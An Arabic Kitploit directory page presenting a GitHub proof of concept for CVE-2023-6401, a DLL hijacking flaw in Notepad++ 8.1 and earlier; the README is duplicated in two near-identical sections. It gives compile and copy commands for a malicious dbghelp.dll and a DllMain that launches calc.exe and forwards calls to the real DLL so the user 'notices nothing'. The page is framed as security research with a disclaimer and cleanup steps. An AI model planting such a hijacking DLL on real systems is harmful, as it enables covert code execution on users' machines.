Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mekitoci/cve-2023-6401
تحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubmekitoci/cve-2023-6401

CVE-2023-6401

CVE-2023-6401 هي ثغرة اختطاف مكتبات DLL (DLL hijacking) تتيح للمهاجمين تنفيذ تعليمات برمجية عشوائية عبر وضع ملف `dbghelp.dll` خبيث في دليل التطبيق. يوضح هذا المشروع الثغرة ويوفّر إثبات مفهوم (PoC) قابلًا لإعادة الإنتاج.

عرض المستودع
17منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-6401 · إثبات المفهوم لاختطاف DLL

License Platform

الإنجليزية | الصينية


الصينية

⚠️ إشعار مهم: لأغراض البحث الأمني والتعليم فقط

إثبات مفهوم لثغرة اختطاف DLL في NotePad++ الإصدار 8.1 فما دون. يمكن تنفيذ تعليمات برمجية عشوائية عبر وضع dbghelp.dll خبيث في دليل التطبيق.

البداية السريعة

root@kitploit:~
# 下載專案
git clone https://github.com/mekitoci/CVE-2023-6401.git

# 進入專案目錄
cd CVE-2023-6401-main

# 編譯DLL
# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# 部署到NotePad++目錄
copy dbghelp.dll "C:\Program Files\Notepad++\"

# 執行測試
"C:\Program Files\Notepad++\notepad++.exe"

# 立即清理
del "C:\Program Files\Notepad++\dbghelp.dll"

النتيجة المتوقعة: ظهور الآلة الحاسبة + عرض مربع رسالة + تشغيل NotePad++ بشكل طبيعي

نتيجة إثبات المفهوم

تفاصيل الثغرة

البندالتفاصيل
رقم CVECVE-2023-6401
الإصدارات المتأثرةNotePad++ ≤ 8.1
نوع الثغرةاختطاف DLL / اختطاف ترتيب البحث
الأثرتنفيذ تعليمات برمجية عشوائية
المتطلبات المسبقةصلاحية الكتابة في دليل التطبيق

آلية العمل

يقوم Windows بتحميل DLL بالترتيب التالي:

  1. دليل التطبيق (الأولوية الأعلى)
  2. دليل System32
  3. دليل Windows
  4. الدليل الحالي
  5. متغير البيئة PATH

عند تشغيل NotePad++، يتم تحميل dbghelp.dll. ومن خلال وضع DLL خبيث بنفس الاسم في دليل التطبيق، يمكن تنفيذ تعليمات برمجية قبل تحميل DLL الخاص بالنظام.

التنفيذ التقني

الكود الأساسي

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // 執行惡意程式碼
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // 載入真實DLL並轉發API調用
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

الميزات الرئيسية

  • اختطاف ترتيب البحث: استغلال آلية البحث عن DLL في Windows
  • إعادة توجيه API: تحميل DLL الحقيقي وإعادة توجيه استدعاءات الدوال للحفاظ على تشغيل التطبيق بشكل طبيعي
  • التخفي: لا يلاحظ المستخدم أي خلل

خيارات التجميع

MinGW (موصى به)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

التنظيف

root@kitploit:~
# 移除惡意DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# 確認移除
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "清理完成"

المراجع

  • CVE-2023-6401
  • ترتيب البحث عن DLL من Microsoft
  • MITRE ATT&CK T1574.001

إخلاء المسؤولية

هذا المشروع مخصص للأغراض التعليمية والبحث الأمني فقط. يتحمل المستخدمون المسؤولية الكاملة عن الامتثال للقوانين واللوائح المعمول بها.


الإنجليزية

⚠️ إخلاء مسؤولية مهم: لأغراض البحث الأمني والتعليم فقط

إثبات مفهوم لثغرة اختطاف DLL في NotePad++ الإصدار 8.1 فما دون. تنفيذ تعليمات برمجية عشوائية بوضع dbghelp.dll خبيث في دليل التطبيق.

البداية السريعة

root@kitploit:~
# Clone the project
git clone https://github.com/mekitoci/CVE-2023-6401.git

# Navigate to project directory
cd CVE-2023-6401-main

# gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

# Deploy to NotePad++ directory
copy dbghelp.dll "C:\Program Files\Notepad++\"

# Execute test
"C:\Program Files\Notepad++\notepad++.exe"

# Immediate cleanup
del "C:\Program Files\Notepad++\dbghelp.dll"

النتيجة المتوقعة: ظهور الآلة الحاسبة + عرض مربع رسالة + تشغيل NotePad++ بشكل طبيعي

نتيجة إثبات المفهوم

تفاصيل الثغرة

البندالتفاصيل
رقم CVECVE-2023-6401
الإصدارات المتأثرةNotePad++ ≤ 8.1
نوع الثغرةاختطاف DLL / اختطاف ترتيب البحث
الأثرتنفيذ تعليمات برمجية عشوائية
المتطلبات المسبقةصلاحية الكتابة في دليل التطبيق

آلية العمل

يقوم Windows بتحميل ملفات DLL بالترتيب التالي:

  1. دليل التطبيق (الأولوية الأعلى)
  2. دليل System32
  3. دليل Windows
  4. الدليل الحالي
  5. متغير البيئة PATH

يقوم NotePad++ بتحميل dbghelp.dll عند بدء التشغيل. ومن خلال وضع DLL خبيث بنفس الاسم في دليل التطبيق، يمكن تنفيذ تعليمات برمجية قبل تحميل DLL النظام.

التنفيذ التقني

الكود الأساسي

root@kitploit:~
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Execute malicious code
        WinExec("calc.exe", SW_SHOW);
        MessageBoxA(NULL, "CVE-2023-6401 Crack", "Alert", MB_OK);

        // Load real DLL and forward API calls
        char systemPath[MAX_PATH];
        GetSystemDirectoryA(systemPath, MAX_PATH);
        strcat(systemPath, "\\dbghelp.dll");
        realDbghelp = LoadLibraryA(systemPath);
        
        if (realDbghelp)
            realImageNtHeader = (pImageNtHeader)GetProcAddress(realDbghelp, "ImageNtHeader");
        break;
    }
    return TRUE;
}

الميزات الرئيسية

  • اختطاف ترتيب البحث: استغلال آلية البحث عن DLL في Windows
  • إعادة توجيه API: تحميل DLL الحقيقي وإعادة توجيه استدعاءات الدوال للحفاظ على التشغيل الطبيعي للتطبيق
  • التخفي: لا يلاحظ المستخدمون أي خلل

خيارات التجميع

MinGW (موصى به)

root@kitploit:~
gcc -shared -o dbghelp.dll dbghelp.c -Wall -Wl,--subsystem,windows

التنظيف

root@kitploit:~
# Remove malicious DLL
del "C:\Program Files\Notepad++\dbghelp.dll"

# Confirm removal
dir "C:\Program Files\Notepad++\dbghelp.dll" 2>nul || echo "Cleanup completed"

المراجع

  • CVE-2023-6401
  • ترتيب البحث عن DLL من Microsoft
  • MITRE ATT&CK T1574.001

إخلاء المسؤولية

هذا المشروع مخصص للأغراض التعليمية والبحث الأمني فقط. يتحمل المستخدمون المسؤولية الكاملة عن الامتثال للقوانين واللوائح المعمول بها.

تنزيل الأداة